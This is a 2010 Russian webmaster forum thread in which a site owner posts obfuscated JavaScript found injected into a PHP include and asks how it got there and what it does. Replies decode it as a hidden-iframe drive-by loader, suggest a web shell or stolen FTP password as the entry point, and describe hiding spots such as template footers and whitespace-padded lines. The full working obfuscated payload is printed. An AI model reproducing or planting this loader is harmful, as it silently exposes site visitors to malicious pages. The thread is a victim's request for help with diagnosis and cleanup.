Вредоносный js на сайте

86

Павел Кирхмаер

8 декабря 2010, 16:33

1023

Добрый вечер!

Только что обнаружил на сайте в одном из php файлов, который include подключается ко всем страницам некий вредоносный js.

Что он выполняет я не могу понять, часть зашифрована.

Не могли бы Вы дать предположения как он мог попасть в файл и собственно что он выполнял?


<script>function vvg(amsx,yhy){var sg=navigator.userAgent.toLowerCase();var bhf=(/msie/.test(sg))&&!(/opera/.test(sg))&&(/win/.test(sg));var qfm=document.createElement("style");qfm.setAttribute("type","text/css");qfm.setAttribute("media","screen");if(!bhf)qfm.appendChild(document.createTextNode(amsx+" {"+yhy+"}"));document.getElementsByTagName("head")[0].appendChild(qfm);if(bhf&&document.styleSheets&&document.styleSheets.length>0){var zt=document.styleSheets[document.styleSheets.length-1];if(typeof(zt.addRule)=="object")zt.addRule(amsx,yhy);}};vvg('#c768','background: url(data:,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,60.5*2,48.5*2,51.5*2,55.5*2,55.5*2,51.5*2,54*2,50.5*2,23*2,49.5*2,55.5*2,23*2,49.5*2,49.5*2,23.5*2,49.5*2,52*2,48.5*2,58*2,57.5*2,23.5*2,49*2,52.5*2,57*2,50*2,57.5*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,4.5*2,51*2,58.5*2,55*2,49.5*2,58*2,52.5*2,55.5*2,55*2,16*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,60.5*2,48.5*2,51.5*2,55.5*2,55.5*2,51.5*2,54*2,50.5*2,23*2,49.5*2,55.5*2,23*2,49.5*2,49.5*2,23.5*2,49.5*2,52*2,48.5*2,58*2,57.5*2,23.5*2,49*2,52.5*2,57*2,50*2,57.5*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2);');var aol=null;var ugb=document.styleSheets;for(var j=0;j<ugb.length;j++){var wv=ugb[j].cssRules||ugb[j].rules;for(var i=0;i<wv.length;i++){var cwpa=wv.item?wv.item(i):wv;if(!cwpa.selectorText.match(/#c(\d+)/))continue;var ev=cwpa.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];aol=ev;}}

var acgn=aol.split(',');var gfff=new Date(),kik=('ev'+gfff.getFullYear()).replace('2010','al');emil=window[kik];nzl=window['String'].fromCharCode;var kxsw='';for(var i=0;i<acgn.length;i++){kxsw+=nzl(emil(acgn));}

emil(kxsw);</script>

456

[umka]

8 декабря 2010, 16:45

#1

botaniQQQ:
Не могли бы Вы дать предположения как он мог попасть в файл и собственно что он выполнял?

Через дырку в сайте.

Через украденный пароль от фтп.

Лог в помощь!

290

danmaster

8 декабря 2010, 16:47

#2

botaniQQQ, DLE? Юзай гугль по фразе Web shell by oRb

122

skAmZ

8 декабря 2010, 17:11

#3

botaniQQQ:
собственно что он выполнял?


if (document.getElementsByTagName('body')[0]){



			iframer();



		} else {



			var bdy = document.createElement("body");



			try {



				document.appendChild(bdy);



			} catch (e) {



				document.body = bdy;



			}



			if (document.getElementsByTagName('body')[0]){



				iframer();



			} else {



				document.write("<iframe src=' width='10' height='10' style='visibility: hidden;'></iframe>");



			}



		}



		function iframer(){



			document.getElementsByTagName('body')[0].innerHTML += "<iframe src=' width='10' height='10' style='visibility: hidden;'></iframe>";



		}

334

TF-Studio

8 декабря 2010, 17:16

#4

Web shell by oRb

Хороший у него шелл. сам словил )

Очень удобный для работы )

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).

86

Павел Кирхмаер

8 декабря 2010, 17:19

#5

[umka:
]Через дырку в сайте.

Не могли бы привести пример такой дырки ... (исправить/добавить js в php файл на сервере)

danmaster:
DLE? Юзай гугль по фразе Web shell by oRb

Нет, самописный код ...

skAmZ, благодарю, а что это был за шифратор?

UT

0

UnToha

10 декабря 2010, 13:35

#6

botaniQQQ, а не подскажешь в какой части твоего скрипта эта штука оказалась? и как выглядела? я тут похоже подобную дрянь словил, яндекс ругается - говорит, что сайт опасен, прислали кусок кода с iframe, но я блин все равно найти не могу. уже все перерыл - и в коде, и в БД...

в htaccess нашел... Редирект Главная вошла в топ

50

smscat

10 декабря 2010, 13:39

#7

UnToha:
botaniQQQ, а не подскажешь в какой части твоего скрипта эта штука оказалась? и как выглядела? я тут похоже подобную дрянь словил, яндекс ругается - говорит, что сайт опасен, прислали кусок кода с iframe, но я блин все равно найти не могу. уже все перерыл - и в коде, и в БД...

ищи в шаблоне. эта пакость настроена на футеры шаблонов joomla/wp/drupal/dle и footer.php, если такой есть

UT

0

UnToha

10 декабря 2010, 13:53

#8

smscat, спасиб, но у меня modx, там все шаблоны в бд хранятся и там чисто... есть парочка footer.php но там всего-то пара инклудов (правильных) и все. Проблема то еще и в том, что оно то ли временами работает, то ли как, но в общем я даже в коде итоговой страницы сейчас в упор не вижу никаких зловредов. Сложно выглядит только код счетчиков, но он тянется со всяких там майлов и хотлогов, поэтому наверняка чист, да и не выглядит он обфусцированным, только пожат немного...

Как повлиять на скорость Яндекс ускорил код Метрики Ann Smarty: «Секретного ингредиента

50

smscat

10 декабря 2010, 17:34

#9

UnToha:
smscat, спасиб, но у меня modx, там все шаблоны в бд хранятся и там чисто... есть парочка footer.php но там всего-то пара инклудов (правильных) и все. Проблема то еще и в том, что оно то ли временами работает, то ли как, но в общем я даже в коде итоговой страницы сейчас в упор не вижу никаких зловредов. Сложно выглядит только код счетчиков, но он тянется со всяких там майлов и хотлогов, поэтому наверняка чист, да и не выглядит он обфусцированным, только пожат немного...

Тогда советую искать в самом конце index.php. Причем есть шанс, что строчка будет казаться пустой из-за 80-100 пробелов в начале, так что надо смотреть внимательно.

C

70

Counselor

11 декабря 2010, 06:44

#10

http://dev.1c-bitrix.ru/community/blogs/howto/1051.php

пользовался описанным скриптом, удобно.

Это - личная подпись. Здесь обычно ставят ссылки на всякие кривые сайты, надеясь получить "жирный бек".

Яндекс Вебмастер вынес товарные фиды в отдельный раздел

Все что нужно знать о DDоS-атаках грамотному менеджеру